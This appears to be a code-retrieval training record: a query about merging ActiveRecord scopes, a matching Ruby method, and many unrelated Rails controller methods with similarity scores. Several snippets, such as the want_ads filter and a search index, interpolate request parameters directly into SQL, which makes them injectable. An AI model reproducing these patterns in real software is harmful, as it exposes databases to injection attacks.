"def search\n @sorting = 'DESC'\n\n if (params[:sortBtn] == 'ASC')\n @sorting = 'ASC'\n else\n @sorting = 'DESC'\n end\n \n @qualities_search = Quality.order(\"strftime('%Y',date) \" + @sorting + \", julian_date DESC, lot DESC, time DESC\").search :lot_or_user_first_name_or_user_last_name_contains => params[:term]\n @users_search = User.order(\"last_name ASC\").search :first_name_or_last_name_or_email_contains => params[:term]\n \n if current_user.facility_id == 3\n @qualities = @qualities_search.where('facility_origin_id = ?','3').order(\"strftime('%Y',date) \" + @sorting + \", julian_date DESC, lot DESC, time DESC\").page params[:qualities_page]\n @users = @users_search.where('facility_id = ?','3').order(\"last_name ASC\").page params[:users_page]\n elsif current_user.facility_id == 2\n @qualities = @qualities_search.where('facility_origin_id = ?','2').order(\"strftime('%Y',date) \" + @sorting + \", julian_date DESC, lot DESC, time DESC\").page params[:qualities_page]\n @users = @users_search.where('facility_id = ?','2').order(\"last_name ASC\").page params[:users_page]\n else\n @qualities = @qualities_search.order(\"strftime('%Y',date) \" + @sorting + \", julian_date DESC, lot DESC, time DESC\").page params[:qualities_page]\n @users = @users_search.order(\"last_name ASC\").page params[:users_page]\n end\n\n respond_to do |format|\n format.html\n format.js\n format.xlsx {\n if !current_user.administrator? and current_user.technician?\n flash[:alert] = 'You do not have the necessary permissions to download this data.'\n redirect_to '/'\n else\n if(params[:searchType] == 'qualities')\n @qualities_search = Quality.order(\"strftime('%Y',date) DESC, julian_date DESC, lot DESC, time DESC\").search :lot_or_user_first_name_or_user_last_name_contains => params[:term]\n if current_user.facility_id == 3\n send_data @qualities_search.where('facility_id = ?','3').order(\"strftime('%Y',date) DESC, julian_date DESC, lot DESC, time DESC\").to_xlsx.to_stream.read, :filename => 'search.xlsx', :type => \"application/vnd.openxmlformates-officedocument.spreadsheetml.sheet\" \n elsif current_user.facility_id == 2\n send_data @qualities_search.where('facility_id = ?','2').order(\"strftime('%Y',date) DESC, julian_date DESC, lot DESC, time DESC\").to_xlsx.to_stream.read, :filename => 'search.xlsx', :type => \"application/vnd.openxmlformates-officedocument.spreadsheetml.sheet\" \n else\n send_data @qualities_search.order(\"strftime('%Y',date) DESC, julian_date DESC, lot DESC, time DESC\").to_xlsx.to_stream.read, :filename => 'search.xlsx', :type => \"application/vnd.openxmlformates-officedocument.spreadsheetml.sheet\" \n end \n elsif(params[:passed] == \"users\")\n #do nothing\n else\n #do nothing\n end\n end\n }\n end\n end",
"def filter\n page = params[:page] || 1\n\n want_ads = WantAd.active.joins(:user)\n .joins(\"LEFT OUTER JOIN addresses a ON a.addressable_id = want_ads.id and a.addressable_type = 'WantAd'\")\n .joins(\"LEFT OUTER JOIN cities ON cities.id = a.city_id\")\n .select('users.name as user_name, cities.name as city_name, want_ads.*')\n\n want_ads = want_ads.where(category_id: params[:category_id]) if params[:category_id].present?\n want_ads = want_ads.where(\"cities.id = #{params[:city_id]}\") if params[:city_id].present?\n want_ads = want_ads.where(\"price >= #{params[:min_price]}\") if params[:min_price].present?\n want_ads = want_ads.where(\"price <= #{params[:max_price]}\") if params[:max_price].present?\n want_ads = want_ads.where(\"deadline <= '#{params[:date]}'\") if params[:date].present?\n want_ads = want_ads.where(\"title ILIKE '%#{params[:search]}%' OR description ILIKE '%#{params[:search]}%'\") if params[:search].present?\n\n want_ads = want_ads.order(\"#{params[:sort_by]}\") if params[:sort_by].present?\n want_ads = want_ads.page(page)\n\n want_ads.map do |want_ad|\n {\n id: want_ad.id,\n title: want_ad.title,\n description: want_ad.description,\n deadline: want_ad.deadline,\n owner_name: want_ad.user_name,\n city_name: want_ad.city_name,\n price: want_ad.price\n }\n end\n\n render json: {\n want_ads: want_ads,\n number_pages: want_ads.total_pages,\n current_page: page\n }\n end",
"def index\n # convert the sorting title to the corresponding database column name\n column_name = Title_To_Column_Name[params[:sort]]\n # default to order by event timestamp\n column_name = \"timestamp\" if column_name.nil?\n # determine the order by clause\n order_by = column_name + \" \" + sort_direction\n \n # determine the search clause based on the search param\n if (params[:id_search] && !params[:id_search].empty?)\n #TODO sanitize the search param since we are now using direct sql.\n search_clause = \"p.id like '#{params[:id_search]}' or s.name like '#{params[:id_search]}'\" \n sql = SQL.gsub(\"search_clause\", search_clause)\n sql = sql.gsub(\"order_by\", order_by) \n else\n names = \n case params[:activity_search]\n when 'submitted'\n \"('submit')\"\n when 'rejected'\n \"('reject','daitss v.1 reject')\" \n when 'archived'\n \"('ingest finished')\"\n when 'disseminated'\n \"('disseminate finished')\"\n when 'error'\n \"('ingest snafu', 'disseminate snafu', 'refresh snafus')\"\n when 'withdrawn'\n \"('withdraw finished')\"\n else\n \"('submit', 'reject', 'ingest finished', 'disseminate finished', 'ingest snafu', 'disseminate snafu', 'withdraw finished', 'daitss v.1 provenance')\"\n end\n # filter on date range\n @start_date = if params[:start_time_search] and !params[:start_time_search].strip.empty?\n DateTime.strptime(params[:start_time_search], \"%Y-%m-%d\")\n else\n Time.at 0\n end\n\n @end_date = if params[:end_time_search] and !params[:end_time_search].strip.empty?\n DateTime.strptime(params[:end_time_search], \"%Y-%m-%d\")\n else\n DateTime.now\n end\n\n @end_date += 1\n # lookup account if passed in\n if (params[:account] && params[:account][\"account_id\"] && !params[:account][\"account_id\"].empty?)\n account = params[:account][\"account_id\"]\n end\n \n # lookup project if passed in\n if (params[:project] && params[:project] [\"project_id\"] && !params[:project][\"project_id\"].empty?)\n # account and project specified\n project = params[:project][\"project_id\"] if account\n end\n \n if account\n if project\n # account and project specified\n search_clause = \"pj.account_id = '#{account}' and pj.id = '#{project}' and \"\n else\n # account but not project specified\n search_clause = \"pj.account_id = '#{account}' and \"\n end\n else \n # neither account nor project specified\n search_clause = \"\" \n end\n search_clause += \"e.timestamp between '#{@start_date}' and '#{@end_date}' and e.name in #{names}\" \n sql = SQL.gsub(\"search_clause\", search_clause)\n sql = sql.gsub(\"order_by\", order_by) \n end\n @results = DataMapper.repository(:default).adapter.select(sql).paginate(page: params[:page])\n end",
"def index\n begin\n\n conditions = \"(parent_id=#{params[:instance_id]} or child_id=#{params[:instance_id]})\"\n params[:conditions] = add_condition(params[:conditions], conditions, :and) \n \n @parcel = get_paginated_records_for(\n :for => Link,\n :start_index => params[:start_index],\n :max_results => params[:max_results],\n :order_by => params[:order_by],\n :direction => params[:direction],\n :conditions => params[:conditions]\n )\n render :response => :GETALL\n rescue Exception => e\n @error = process_exception(e)\n render :response => :error\n end\n \n\n end",
"def batch_query\n render nothing: true\n\n # logger.info \"params: \" + params.inspect\n #\n # endpoints_all = Endpoint.all\n # logger.info \"List of all endpoints:\"\n # endpoints_all.each do |endpoint|\n # logger.info ' name: ' + endpoint[:name] + ', url: ' + endpoint[:base_url]\n # end\n\n # Select endpoints using array of endpoint names;\n # Unfortunately, they are not necessarily unique\n endpoint_names = params[:endpoint_names]\n logger.info 'param endpoint_names:' + endpoint_names.inspect\n selected_endpoints = []\n if endpoint_names\n parse_array(endpoint_names).each do |endpoint_name|\n match_ep = Endpoint.find_by_name(endpoint_name)\n if match_ep\n logger.info endpoint_name.to_s + ' matches: ' + match_ep[:name].inspect\n selected_endpoints.push(match_ep)\n else\n logger.info 'WARNING: ' + endpoint_name.to_s + ' has no match!'\n end\n end\n end\n # logger.info 'selected endpoings: ' + selected_endpoints.inspect\n\n\n # users = User.all\n # users.each do |user|\n # logger.info 'username: ' + user[:username]\n # end\n\n # queries_all = Query.all\n # logger.info \"List of all queries:\"\n # queries_all.each do |query|\n # logger.info ' title: ' + query[:title] + ', desc: ' + query[:description]\n # end\n\n # Select query using array of query descriptions;\n # Unfortunately, they are not necessarily unique\n #query_titles = params[:query_titles]\n username = params[:username]\n current_user = User.find_by_username(username)\n if current_user\n query_descriptions = params[:query_descriptions]\n # logger.info 'param query_descriptions:' + query_descriptions.inspect\n selected_queries = []\n if query_descriptions\n parse_array(query_descriptions).each do |query_desc|\n match_query = current_user.queries.find_by_description(query_desc)\n if match_query\n logger.info query_desc + ' matches: ' + match_query[:description].inspect\n selected_queries.push(match_query)\n else\n logger.info 'WARNING: ' + query_desc + ' has no match!'\n end\n end\n end\n end\n # logger.info 'selected queries: ' + selected_queries.inspect\n\n if selected_endpoints && !selected_endpoints.empty? &&\n selected_queries && !selected_queries.empty?\n notify = params[:notification]\n selected_queries.each do |eachQuery|\n #Parallel.each(selected_queries, :in_threads=>15) do |eachQuery|\n # execute the query, and pass in the endpoints and if the user should be notified by email when execution completes\n # logger.info 'title: ' + eachQuery[:title].inspect\n # logger.info 'desc: ' + eachQuery[:description].inspect\n # logger.info 'user_id: ' + eachQuery[:user_id].inspect\n eachQuery.execute(selected_endpoints, notify)\n end\n else\n flash[:alert] = 'Cannot execute a query if no endpoints are provided.'\n end\n end",
"def distinct\n with_opts(:distinct=>true)\n end",
"def index\n #@songs = Song.all\n authorize Song\n @q = Song.search(params[:q])\n @songs = @q.result(distinct: true)\n @songs = @songs.order(\"#{sort_column} #{sort_direction}\")\n end",
"def index\n @results = {}\n\n if TeSS::Config.solr_enabled\n SEARCH_MODELS.each do |model_name|\n model = model_name.constantize\n @results[model_name.underscore.pluralize.to_sym] = Sunspot.search(model) do\n fulltext search_params\n\n with('end').greater_than(Time.zone.now) if model_name == 'Event'\n\n\n # Hide failing records\n if model.method_defined?(:link_monitor)\n unless current_user && current_user.is_admin?\n without(:failing, true)\n end\n end\n\n if model.attribute_method?(:user_requires_approval?)\n # TODO: Fix this duplication!\n # Hide shadowbanned users' events, except from other shadowbanned users and administrators\n unless current_user && (current_user.shadowbanned? || current_user.is_admin?)\n without(:shadowbanned, true)\n end\n\n # Hide unverified users' things, except from curators and admins\n unless current_user && (current_user.is_curator? || current_user.is_admin?)\n without(:unverified, true)\n end\n end\n end\n end\n \n end\n\n @results.reject! { |_, result| result.total < 1 }\n end",
"def index\n @task_links = TaskLink.all\n if params[:task_id]\n task = Task.viewable_tasks(current_user).find(params[:task_id])\n @task_links = @task_links.where(id: [] + task.from_link_ids + task.to_link_ids)\n else\n @task_links = @task_links.where(from_task_id: params[:from_task_id]) if params[:from_task_id]\n @task_links = @task_links.where(to_task_id: params[:to_task_id]) if params[:to_task_id]\n end\n #Filter out duplicate....\n @task_links = @task_links.where(\"from_task_id < to_task_id or link_type <> 'duplicate'\")\n\n #Apply security constraints\n #@task_links = Kaminari.paginate_array(@task_links.select { |task_link|\n #true\n #})\n\n @task_links = page(@task_links)\n end",
"def index\n #@results = Result.all\n @run = Run.find(params[:run_id]) if params[:run_id] && params[:run_id].to_i > 0\n @runs = Run.find(:all, :order => \"eventday desc\", :conditions => {:showresults => true})\n #@results = Result.all\n @categories = Result.find_by_sql(\"select run_id, cat from results group by run_id, cat;\")\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @results }\n end\n end",
"def source_results(race)\n category_ids = category_ids_for(race).join(\", \")\n\n Result.all(\n :include => [:race, {:person => :team}, :team, {:race => [{:event => { :parent => :parent }}, :category]}],\n :conditions => [%Q{\n (events.type in ('Event', 'SingleDayEvent', 'MultiDayEvent') or events.type is NULL)\n and bar = true\n and categories.id in (#{category_ids})\n and (events.discipline = '#{race.discipline}'\n or (events.discipline is null and parents_events.discipline = '#{race.discipline}')\n or (events.discipline is null and parents_events.discipline is null and parents_events_2.discipline = '#{race.discipline}'))\n and (races.bar_points > 0\n or (races.bar_points is null and events.bar_points > 0)\n or (races.bar_points is null and events.bar_points is null and parents_events.bar_points > 0)\n or (races.bar_points is null and events.bar_points is null and parents_events.bar_points is null and parents_events_2.bar_points > 0))\n and events.date between '#{date.year}-01-01' and '#{date.year}-12-31'\n }],\n :order => 'person_id'\n )\n end",
"def index\n @search = PurchaseRequisition.search(params[:search])\n @purchase_requisitions = @search.order('pr_date DESC , created_at DESC').all.uniq.paginate(:page => params[:page], :per_page => 20)\n \n end",
"def index\n #@parameters = Parameter.all\n @q = Parameter.search(params[:q])\n @parameters = @q.result(:distinct => true).order(sort_column + ' ' + sort_direction).paginate( :page => params[:page])\n @q.build_condition\n \n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @parameters }\n end\n end",
"def index\n @q = Item.search(params[:q])\n @items = @q.result(distinct: true)\n end",
"def indexSuites\n @q = Vendor.where(entry:'Suit').ransack(params[:q])\n\n @per_page = params[:per_page] || Vendor.per_page || 20\n @vendors = @q.result(:distinct=>true).paginate( :per_page => @per_page, :page => params[:page])\n if @vendors.size.zero?\n flash[:notice] = \"No Matches Found\"\n end\n end",
"def index\n\n sort_columns = {\n 'default' => 'latest_github_activity_at',\n 'github-joined' => 'github_created_at',\n 'github-followers' => 'followers'\n }\n\n params[:sort_order] = params[:sort_order] || 'desc'\n\n if params[:sort_by].present?\n order_by_string = \"#{sort_columns[params[:sort_by]]} #{params[:sort_order].upcase}\"\n else\n order_by_string = \"#{sort_columns['default']} #{params[:sort_order].upcase}\"\n end\n\n if params[:language].present?\n\n language = Language.find_by(slug: params[:language])\n @profiles = language.profiles.includes([:code_wars_datum, :languages]).reorder(order_by_string).paginate(:page => (params[:page] || 1), :per_page => 100)\n\n elsif params[:username].present?\n\n @profiles = Profile.includes([:code_wars_datum, :languages]).search(params[:username]).reorder(order_by_string).paginate(:page => (params[:page] || 1), :per_page => 100)\n\n else\n\n @profiles = Profile.includes([:code_wars_datum, :languages]).reorder(order_by_string).paginate(:page => (params[:page] || 1), :per_page => 100)\n\n end\n\n end",
"def result\n query_group.with_context do\n if primary.summarise?\n summary_result\n else\n simple_result\n end\n end\n end",
"def paged_results\n results = WillPaginate::Collection.create( @index.current_page, @index.docs_per_page, @index.current_results_total ) do |pager|\n pager.replace(@index.ordered_results)\n end\n return results\n end",
"def load_records\n get_paging_parameters\n @filter, @subfilter, find_include, find_conditions, @total_records = filter_prepare\n find_order = @sortable_columns.has_key?(@sidx) ? (@sortable_columns[@sidx] + ' ' + ((@sord == 'desc') ? 'DESC' : 'ASC')) :\n (@default_sidx ? @sortable_columns[@default_sidx] + ' ASC' : nil)\n # find_order = @sortable_columns.include?(@sidx) ? (@sidx + ' ' + ((@sord == 'desc') ? 'DESC' : 'ASC')) :\n # (@default_sidx ? @default_sidx + ' ASC' : nil)\n rows_per_page = @rows_per_page\n if rows_per_page > 0\n @total_pages = (@total_records > 0 && rows_per_page > 0) ? 1 + (@total_records/rows_per_page).ceil : 0\n @page = @total_pages if @page > @total_pages\n @page = 1 if @page < 1\n @start_offset = rows_per_page*@page - rows_per_page\n else\n @total_pages = 1\n rows_per_page = @total_records\n @start_offset = 0\n end\n if @start_offset < 0\n puts \"??Why is start_offset negative?\"\n @start_offset = 0\n end\n if @livesearch && @livesearch.size > 0\n livesearch_fields = @livesearch_fields[@livesearch_field] rescue []\n if livesearch_fields.size > 0\n fields_conditions = []\n @livesearch.split(' ').each do |substring|\n live_conditions = [] \n livesearch_fields.each do |f|\n find_conditions << \"%#{substring}%\"\n live_conditions << \"#{f} LIKE ?\" \n end\n fields_conditions << '(' + live_conditions.join(' or ') + ')'\n end\n find_conditions[0] += ' and (' + fields_conditions.join(' and ') + ')'\n end\n end\n puts \"Rows per page #{@rows_per_page}, offset #{@start_offset}, find_order #{find_order}, find_conditions #{find_conditions}, find_include #{find_include}.\"\n scoped_model.find(:all, :include => find_include, :conditions => find_conditions,\n :limit => rows_per_page, :offset => @start_offset, :order => find_order)\n end",
"def index\n @results = @search.result.paginate(page: params[:page], per_page: 9).order(created_at: :desc)\n end",
"def index\n #search query, check params for search then search by appropriate fields\n @q = Entry.all\n @author_id = params[:search][:author_id] if params[:search]\n @text = params[:search][:text] if params[:search]\n @q = Entry.search(@q, @text) if !@text.blank?\n @q = @q.where(author_id: params[:search][:author_id]) if !@author_id.blank?\n\n #final result and column toggle sort\n @entries = @q.paginate(:page => params[:page], :per_page => 30).includes(:author).order(sort_column + \" \" + sort_direction)\n end",
"def exercise2\n @content = ActiveRecord::Base.connection.execute(\"\n SELECT\n gr.name as group_name,\n u.name as user_name,\n sum(m.mapviews) as groups_count\n FROM (((users as u\n INNER JOIN groups_users as gu ON u.id=gu.user_id)\n INNER JOIN groups as gr ON gr.id = gu.group_id)\n INNER JOIN maps as m ON m.user_id = u.id)\n GROUP BY (gr.name, u.name)\n ORDER BY gr.name, groups_count DESC;\");\n\n @results2 = []\n\n index = 0\n @content.each do |r|\n @results2[index] = Result2.new r\n index = index + 1;\n end\n\n return @results2\n end",
"def index\n # no pagination for CSV export\n per_page = request.format.to_s.eql?('text/csv') ? 10000 : Person.per_page\n @results = if index_params[:q]\n Person.search index_params[:q], per_page: per_page, page: (index_params[:page] || 1)\n elsif index_params[:adv]\n Person.complex_search(index_params, per_page) # FIXME: more elegant solution for returning all records\n else\n []\n end\n @tags = index_params[:tags].blank? ? '[]' : Tag.where(name: index_params[:tags].split(',').map(&:strip)).to_json(methods: [:value, :label, :type])\n\n respond_to do |format|\n format.json { @results.map { |r| r['type'] = 'person' }.to_json }\n format.html {}\n format.csv do\n fields = Person.column_names\n fields.push('tags')\n output = CSV.generate do |csv|\n # Generate the headers\n csv << fields.map(&:titleize)\n\n # Some fields need a helper method\n human_devices = %w(primary_device_id secondary_device_id)\n human_connections = %w(primary_connection_id secondary_connection_id)\n\n # Write the results\n @results.each do |person|\n csv << fields.map do |f|\n field_value = person[f]\n if human_devices.include? f\n human_device_type_name(field_value)\n elsif human_connections.include? f\n human_connection_type_name(field_value)\n elsif f == 'tags'\n if person.tag_values.blank?\n ''\n else\n person.tag_values.join('|')\n end\n else\n field_value\n end\n end\n end\n end\n send_data output\n end\n end\n end",
"def get_select_on_records(mc, iter)\n if iter[0] == SELECT_ARTISTS\n if mc.view_compile?\n sql = %Q{SELECT DISTINCT(artists.rartist), artists.sname FROM artists\n INNER JOIN records ON records.rartist = artists.rartist }\n else\n sql = %Q{SELECT DISTINCT(artists.rartist), artists.sname FROM artists\n INNER JOIN segments ON segments.rartist = artists.rartist\n INNER JOIN records ON records.rrecord = segments.rrecord }\n end\n else\n sql = %Q{SELECT DISTINCT(records.stitle), artists.rartist, artists.sname, records.rrecord FROM records\n INNER JOIN artists ON records.rartist = artists.rartist }\n end\n end",
"def index\n @search = Project.search(params[:q])\n @projects = @search.result(:distinct => true).paginate(:page => params[:page], :per_page=>10).order(\"id DESC\")\n end",
"def scaffold_get_objects(options)\n optionshash = {}\n data = self.all\n if options[:conditions]\n conditions = options[:conditions]\n if conditions && Array === conditions && conditions.length > 0\n if String === conditions[0]\n data = data.all(:conditions => conditions)\n else\n conditions.each do |cond|\n next if cond.nil?\n data = case cond\n when Hash, String then data.all(:conditions => [cond.gsub(\"NULL\",\"?\"),nil])\n when Array then \n if cond.length==1\n data.all(:conditions => [cond[0].gsub(\"NULL\",\"?\"),nil])\n else\n data.all(:conditions => cond)\n end\n when Proc then data.all(&cond)\n end\n end\n end\n end\n end\n slice = nil\n if options[:limit]\n startpos = options[:offset] || 0\n endpos = options[:limit]\n slice = [startpos,endpos]\n end\n # TODO includes break SQL generation\n # optionshash[:links] = options[:include] if options[:include]\n # optionshash[:links] = [optionshash[:links]] unless optionshash[:links].is_a?(Array)\n if options[:order] then\n optionshash[:order] = get_ordering_options(options[:order])\n end\n if slice then\n q = data.all(optionshash).slice(*slice)\n else\n q = data.all(optionshash)\n end\n #p repository.adapter.send(\"select_statement\",q.query)\n q.to_a\n end",
"def results_with_rows\n load_from_rows(@dataset.all, true)\n end",
"def index\n @up_to_date = check_if_asqs_up_to_date\n # If we're passed a tag in the params...\n init_results_for_tag && return if params[:tag]\n # If we're passed a search string...\n init_results_for_search && return if params[:search]\n # Otherwise, show all the asqs\n @asqs = Asq.joins(\"left join asq_statuses on asq_statuses.status_enum = \\\n asqs.status\")\n .order(\"disabled ASC, query_type ASC, \\\n asq_statuses.sort_priority ASC\")\n .paginate(page: params[:page])\n end",
"def results\n populate\n @results\n end",
"def targeted_app_results\n selected_app_results.where(account_path: selected_app_results.first.account_path)\n .page(0).per(10)\n end",
"def indexVilla\n @q = Vendor.where(entry:'Villa').ransack(params[:q])\n\n @per_page = params[:per_page] || Vendor.per_page || 20\n @vendors = @q.result(:distinct=>true).paginate( :per_page => @per_page, :page => params[:page])\n if @vendors.size.zero?\n flash[:notice] = \"No Matches Found\"\n end \n end",
"def generate_search_query(per_page)\n q = Replay.select(\"DISTINCT(replays.*)\").public.processed.includes(:event, :plays, :players)\n \n player_id = nil\n if params[:player] =~ /\\A#\\d+\\z/\n player_id = params[:player][1..-1].to_i\n end\n\n if player_id\n q = q.joins(:plays).where(:plays => {:player_id => player_id})\n elsif !params[:player].blank?\n q = q.joins(:players).where(\"players.name ILIKE ?\", \"%#{params[:player]}%\")\n else\n end\n \n unless params[:league].blank?\n q = q.joins(:players).where(\"players.league_1v1 = ?\", params[:league])\n end\n \n unless params[:gateway].blank?\n q = q.where(\"replays.gateway = ?\", params[:gateway])\n end\n \n unless params[:map].blank?\n q = q.where(\"replays.map_name LIKE ?\", \"%#{params[:map]}%\")\n end\n \n unless params[:version].blank?\n q = q.where(:version => params[:version])\n end\n \n unless params[:game_format].blank?\n q = q.where(:game_format => params[:game_format])\n end\n \n mu = params[:mu]\n @any = false\n if mu == \"tvp\"\n q = q.where(:terrans => 1, :protosses => 1, :zergs => 0)\n elsif mu == \"tvz\"\n q = q.where(:terrans => 1, :protosses => 0, :zergs => 1)\n elsif mu == \"pvz\"\n q = q.where(:terrans => 0, :protosses => 1, :zergs => 1)\n elsif mu == \"tvt\"\n q = q.where(:terrans => 2, :protosses => 0, :zergs => 0)\n elsif mu == \"pvp\"\n q = q.where(:terrans => 0, :protosses => 2, :zergs => 0)\n elsif mu == \"zvz\"\n q = q.where(:terrans => 0, :protosses => 0, :zergs => 2)\n else\n @any = true\n end\n \n if params[:order] == \"date_posted\"\n q = q.order(\"replays.created_at DESC\")\n elsif params[:order] == \"date_played\"\n q = q.order(\"replays.saved_at DESC\")\n elsif params[:order] == \"downloads\"\n q = q.order(\"replays.downloads DESC\")\n elsif params[:order] == \"comments\"\n q = q.order(\"replays.comments_count DESC\")\n else\n q = q.recent\n params[:order] = \"date_posted\"\n end\n \n # @replays = q.includes(:plays => [:player]).paginate(:per_page => 5, :page => params[:page])\n @replays = q.paginate(:per_page => per_page, :page => params[:page])\n end"
] |
[
"0.6160042",
"0.6120058",
"0.6064114",
"0.60056746",
"0.59882987",
"0.5966952",
"0.58973354",
"0.58908457",
"0.58827794",
"0.58698183",
"0.5845055",
"0.5842389",
"0.58325195",
"0.5831484",
"0.5828574",
"0.58214664",
"0.5814785",
"0.58070767",
"0.579143",
"0.57909274",
"0.57800126",
"0.57417184",
"0.5728857",
"0.57179356",
"0.57000357",
"0.5698483",
"0.56859106",
"0.56725526",
"0.56723505",
"0.5666122",
"0.5664804",
"0.56520045",
"0.5647802",
"0.56463283",
"0.5642122",
"0.56386554",
"0.5628479",
"0.5615538",
"0.5614155",
"0.56114644",
"0.5583786",
"0.5574476",
"0.5558273",
"0.55547637",
"0.55537623",
"0.55499554",
"0.55488086",
"0.5547902",
"0.5546638",
"0.5545328",
"0.55412626",
"0.554102",
"0.55352426",
"0.5530885",
"0.55290246",
"0.55284",
"0.5524451",
"0.55190045",
"0.5517675",
"0.5516855",
"0.55137306",
"0.55134577",
"0.5501921",
"0.5496571",
"0.549476",
"0.5494367",
"0.5494367",
"0.5494367",
"0.54939437",
"0.54788816",
"0.5473711",
"0.5472205",
"0.54704046",
"0.5469454",
"0.54611635",
"0.5450192",
"0.54480046",
"0.5445804",
"0.5442144",
"0.5441055",
"0.54360276",
"0.543442",
"0.54334116",
"0.54319966",
"0.54317325",
"0.5425479",
"0.54245675",
"0.5424179",
"0.5419691",
"0.5419089",
"0.5416698",
"0.54137194",
"0.5412463",
"0.5411796",
"0.5411666",
"0.54113466",
"0.5410449",
"0.5408026",
"0.53969646",
"0.53945154",
"0.53917176"
] |
0.0
|
-1
|
Merge all AR relation scopes into one.
|
def subquery
subqueries.
compact.
inject(&:merge)
end
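A minimal sketch of how this pattern could look in context; the `EventQuery` class, the `Event` model, and the filter helpers are assumptions for illustration, not from the source. `ActiveRecord::Relation#merge` combines the clauses of two relations, so `inject(&:merge)` folds the whole list into a single relation (nil if every subquery was skipped).

# Hypothetical illustration; Event and all helper names are assumptions.
class EventQuery
  def initialize(start_date: nil, end_date: nil)
    @start_date = start_date
    @end_date = end_date
  end

  # Fold every non-nil relation into one combined relation.
  def subquery
    subqueries.compact.inject(&:merge)
  end

  def subqueries
    [filter_by_start_date, filter_by_end_date]
  end

  private

  # Each helper returns an ActiveRecord::Relation, or nil when unused.
  def filter_by_start_date
    Event.where("starts_at >= ?", @start_date) if @start_date
  end

  def filter_by_end_date
    Event.where("starts_at <= ?", @end_date) if @end_date
  end
end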
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def merge(new_scopes); end",
"def all\n if current_scope\n current_scope.clone\n else\n default_scoped\n end\n end",
"def all\n @env.reverse.inject { |env, scope| env.merge scope }\n end",
"def merge!(scope)\n @options.merge!(scope.options)\n\n @attributes += scope.attributes\n @associations.merge!(scope.associations)\n\n @attributes.uniq!\n\n self\n end",
"def relation_scope\n if @scope\n @model_class.unscoped { @scope.send(resource_name).scope }\n else\n @model_class.unscoped\n end\n end",
"def scopes\n scope ? [scope] : []\n end",
"def scope_chain\n scope ? [[scope]] : [[]]\n end",
"def resolve\n scope.all\n end",
"def apply_scopes(*)\n relation = super\n relation = relation.accessible_by(current_ability) if scope_accessible?\n relation\n end",
"def scopes\n read_inheritable_attribute(:scopes) || write_inheritable_attribute(:scopes, {})\n end",
"def scope\n assoc_scope = method(:association_scope)\n join_scope = method(:join_association_scope)\n\n ->(join_or_parent) {\n if join_or_parent.is_a?(ActiveRecord::Associations::JoinDependency::JoinAssociation)\n join_scope[join_or_parent]\n elsif join_or_parent.is_a?(ActiveRecord::Base)\n assoc_scope[join_or_parent]\n else\n where(nil)\n end.extending(Relation::Iterable)\n }\n end",
"def expand(scopes)\n scopes = Array(scopes.to_a)\n registered_scopes = scopes.filter { |sc| @mapping.key?(sc) }\n result = registered_scopes + registered_scopes.reduce([]) { |memo, sc|\n memo + Array(@mapping.fetch(sc))\n }.uniq\n\n Scopes.wrap(result)\n end",
"def scopes\n @@scopes ||= {}\n end",
"def scoped_all(organization_scoped_ar)\n organization_scoped_ar.organization_scope(organization).all\n end",
"def scopes; end",
"def scopes\n @scopes ||= {}\n end",
"def all_scopes\n @all_scopes ||=\n {'identity' => (auth['scope'] || apps_permissions_users_list[user_id].to_h['scopes'].to_a.join(',')).to_s.split(',')}\n .merge(auth['scopes'].to_h)\n end",
"def apply_standard_scope\n each_sort do |attribute, direction|\n @scope = resource.adapter.order(@scope, attribute, direction)\n end\n @scope\n end",
"def all_associations\n @all_associations ||= (\n # field associations\n @fields.collect { |field|\n field.associations.values\n }.flatten +\n # attribute associations\n @attributes.collect { |attrib|\n attrib.associations.values\n }.flatten\n ).uniq.collect { |assoc|\n # get ancestors as well as column-level associations\n assoc.ancestors\n }.flatten.uniq\n end",
"def scopes\n @scope.scopes\n end",
"def scope\n return @scope if @scope\n\n @scope = hard_scope.dup\n soft_dependencies = []\n\n enabled_dependencies.each do |dependency|\n binds = nil\n node = nil\n\n if dependency.polymorphic?\n alias_prefix = SOFT_PREFIX if @scope.manager.ast.with&.children&.map(&:left)&.map(&:name)&.include?(\"#{HARD_PREFIX}#{dependency.name.to_s.pluralize}\")\n dependency.models.each do |model|\n next unless model.scoped?\n next unless circular_dependency?(dependency, model) || alias_prefix\n\n model_manager = model.hard_scope.manager.dup\n model_manager.projections = [\n Arel::Nodes::As.new(Arel::Nodes::Quoted.new(model.clazz.name), Arel::Nodes::SqlLiteral.new(:type.to_s)),\n model.primary_key.as(:id.to_s)\n ]\n\n if node\n binds.concat(model.hard_scope.binds)\n node = node.union_all(model_manager)\n else\n binds = model.hard_scope.binds\n node = model_manager.ast\n end\n end\n else\n next unless circular_dependency?(dependency) && dependency.soft?\n next unless dependency.models.first.scoped?\n\n model = dependency.models.first\n binds = model.hard_scope.binds\n manager = model.hard_scope.manager.dup\n manager.projections = [model.primary_key.as(:id.to_s)]\n node = manager.ast\n end\n\n next unless node\n\n dependencies = Arel::Table.new(\"#{alias_prefix}#{dependency.name.to_s.pluralize}\")\n\n on = dependencies[:id].eq(arel_table[dependency.foreign_key])\n on = dependencies[:type].eq(arel_table[dependency.foreign_type]).and(on) if dependency.polymorphic?\n\n @scope.manager\n .join(dependencies, Arel::Nodes::OuterJoin)\n .on(on)\n .prepend_with(Arel::Nodes::As.new(dependencies, Arel::Nodes::Grouping.new(node)))\n @scope.binds.unshift(*binds)\n soft_dependencies << DependencyTable.new(dependency, dependencies)\n end\n\n unless soft_dependencies.empty?\n @scope.manager.projections = enabled_columns.keys.map do |column|\n info = soft_dependencies.find { |dt| dt.dependency.foreign_key == column }\n next info.table[info.dependency.models.first.clazz.primary_key].as(info.dependency.foreign_key) if info\n\n info = soft_dependencies.find { |dt| dt.dependency.foreign_type == column }\n next info.table[:type].as(info.dependency.foreign_type) if info\n\n arel_table[column]\n end\n end\n\n @scope\n end",
"def associations_scope\n model_class_name.constantize.all\n end",
"def associations_scope\n model_class_name.constantize.all\n end",
"def expand_scopes(scopes)\n scopes.map do |scope|\n [scope, descendents(scope)]\n end.flatten.uniq.sort\n end",
"def define_all_scopes\n if self.resource_definition[\"scopes\"]\n self.resource_definition[\"scopes\"].each_pair do |name, opts|\n self.scope(name, opts)\n end\n end\n true\n end",
"def scopes\n model.scopes\n end",
"def scopes\n scope_names.to_a.sort\n end",
